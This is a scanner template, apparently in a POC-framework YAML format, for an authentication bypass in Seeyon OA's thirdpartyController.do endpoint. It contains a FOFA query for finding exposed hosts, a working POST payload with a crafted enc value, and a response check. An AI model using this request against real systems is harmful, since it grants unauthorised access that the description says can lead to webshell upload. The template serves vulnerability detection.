product: 致远OA
vName: 致远OA thirdpartyController.do 权限绕过
type: 访问控制
vID: [ ]
level: 3
vDesc: 致远OA系统在web页面 /seeyon/thirdpartyController.do 系统默认enc参数值过滤不足，攻击者通过构造恶意请求，获取用户访问权限，如果系统存在portalDesignerManager类，攻击者可以进一步利用漏洞写入脚本木马，从而获得管理员权限，在网页上加挂木马和各种恶意程序，盗取敏感信息等。
version: ''
note: ''
search:
  FOFA: app="致远互联-OA"
protocol: http
link: https://blog.51cto.com/u_15127579/2778196
fix:
  - 升级系统。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /seeyon/thirdpartyController.do
      data: method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - a8genius.do
            logic: and